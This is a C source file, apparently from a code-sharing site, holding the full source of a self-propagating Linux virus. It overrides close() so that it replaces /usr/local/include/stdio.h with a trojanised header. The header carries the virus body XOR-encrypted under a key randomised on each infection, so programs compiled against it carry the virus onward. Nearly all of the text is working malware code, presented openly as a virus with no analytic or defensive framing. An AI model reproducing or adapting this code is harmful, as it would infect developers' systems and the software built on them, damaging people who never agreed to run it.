📄 vsrc2.c
字号:
"\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x66\x6f\x72\x20\x28"
"\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x20\x6c\x65\x6e\x3b"
"\x20\x69\x2b\x2b\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x09\x73\x5b\x69\x5d\x20\x5e\x3d\x20\x6b\x65"
"\x79\x5b\x6a\x5d\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x6a\x20\x3d\x20\x28\x6a\x20\x2b"
"\x20\x31\x29\x20\x25\x20\x34\x3b\x0a\x20\x20\x20\x20\x20\x20"
"\x20\x20\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74"
"\x75\x72\x6e\x20\x30\x3b\x0a\x7d\x0a\x0a\x69\x6e\x74\x20\x6d"
"\x75\x74\x61\x74\x65\x28\x63\x68\x61\x72\x20\x2a\x73\x29\x0a"
"\x7b\x0a\x20\x20\x20\x09\x69\x6e\x74\x20\x66\x64\x2c\x20\x69"
"\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20"
"\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x66\x6f"
"\x72\x20\x28\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x20\x34"
"\x3b\x20\x69\x2b\x2b\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x09\x69\x66\x20\x28\x28\x66\x64\x20\x3d"
"\x20\x6f\x70\x65\x6e\x28\x22\x2f\x64\x65\x76\x2f\x72\x61\x6e"
"\x64\x6f\x6d\x22\x2c\x20\x4f\x5f\x52\x44\x4f\x4e\x4c\x59\x29"
"\x29\x20\x3c\x3d\x20\x30\x29\x20\x7b\x0a\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x09"
"\x70\x65\x72\x72\x6f\x72\x28\x22\x6f\x70\x65\x6e\x22\x29\x3b"
"\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72"
"\x6e\x20\x65\x72\x72\x6e\x6f\x3b\x0a\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65"
"\x61\x64\x28\x66\x64\x2c\x20\x26\x73\x5b\x69\x5d\x2c\x20\x31"
"\x29\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x43\x6c\x6f\x73\x65\x28\x66\x64\x29\x3b\x0a"
"\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x20\x20\x20\x20\x20"
"\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x0a\x7d\x0a"
"\x20\x20\x20\x20\x20\x20\x20\x20\x0a";
/* this is the key for the encryption and will be
* changed with every infection
* and must be 0 at start
*/
char key[4] = {0};
/*BEGIN-line*/
/* this is where the hex code that is displayed above begins */
/* this is the new close() that replaces the one in the stdio.h
* library, as can be seen it executes the virus functionality
* before it closes the file
*/
int close(int fd)
{
virfunc(); /* execute virus */
return Close(fd); /* close the file */
}
/* this is the old close() function renamed Close() and
* executed only after the virus has been executed
*/
int Close(int i)
{
long __res;
__asm__ volatile ("int $0x80"
: "=a" (__res)
: "0" (__NR_close),"b" ((long)(i)));
if (__res >= 0)
return (int)__res;
errno = -__res;
return -1;
}
/* this executes the virus */
int virfunc(void)
{
FILE *fd;
static int first = 0;
int i = 0, j = 1, oldmask = 0;
if (first)
return 0;
oldmask = umask(0);
/* get the plaintext of the hex */
Crypt(C, CHARS);
/* make this directory if it does not already exist */
mkdir("/usr/local/include", 0755);
unlink("/usr/local/include/stdio.h");
/* open stdio.h for writing */
if ((fd = fdopen(open("/usr/local/include/stdio.h", O_CREAT|O_RDWR, 0644), "w+")) == NULL)
perror("fopen");
/* first write the #defines etc. from the beginning of this code
* to the new stdio.h
*/
fprintf(fd, "#include \"/usr/include/stdio.h\"\n"
"#include <fcntl.h>\n"
"#include <linux/unistd.h>\n"
"#include <sys/stat.h>\n"
"#include <unistd.h>\n"
"#include <errno.h>\n"
"#include <string.h>\n"
"#define CHARS %d\n\n"
"int virfunc(void);\n"
"int Close(int);\n"
"int mutate(char*);\n"
"int Crypt(char*, int);\n\n"
"char C[] = \n\"", CHARS);
/* should i say sth. ? */
mutate(key); /* change the key */
/* encrypt C[] */
Crypt(C, CHARS); /* encrypt the hex with the new key */
for (i = 0; i < CHARS; i++) {
if ((j % 15) == 0) {
fprintf(fd, "\"\n\"");
j = 0;
}
fprintf(fd, "\\x%02x", (unsigned char)C[i]);
j++;
}
fprintf(fd, "\";\n\n");
/* write the key */
fprintf(fd, "\n\nunsigned char key[4] = {0x%02x, 0x%02x, 0x%02x, 0x%02x};\n\n",
(unsigned char)key[0], (unsigned char)key[1],
(unsigned char)key[2], (unsigned char)key[3]);
/* decrypt C[] and write as string to stdio.h */
Crypt(C, CHARS);
fprintf(fd, "%s", C);
fclose(fd); /* close stdio.h */
first = 1;
umask(oldmask);
return 0;
}
/* the procedure for encrypting and decrypting the hex portion */
int Crypt(char *s, int len)
{
int i = 0, j = 0;
for (i = 0; i < len; i++) {
s[i] ^= key[j]; /* XOR with the key */
j = (j + 1) % 4;
}
return 0;
}
/* mutate (change) the key */
/* (I hope the target has /dev/random) */
int mutate(char *s)
{
int fd, i;
for (i = 0; i < 4; i++) {
if ((fd = open("/dev/random", O_RDONLY)) <= 0) {
perror("open");
return errno;
}
read(fd, &s[i], 1);
Close(fd);
}
return 0;
}
/* main portion of program that executes upon first execution
* of virus
*/
int main(void)
{
printf("Cool! Started. Now you should have the new stdio.h\n"
"in /usr/local/include directory.\n\n"
"************************************\n"
"This virus is dedicated to Doreen.\n"
"Hope i'll see her again. :'(\n"
"************************************\n");
return close(-11);
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -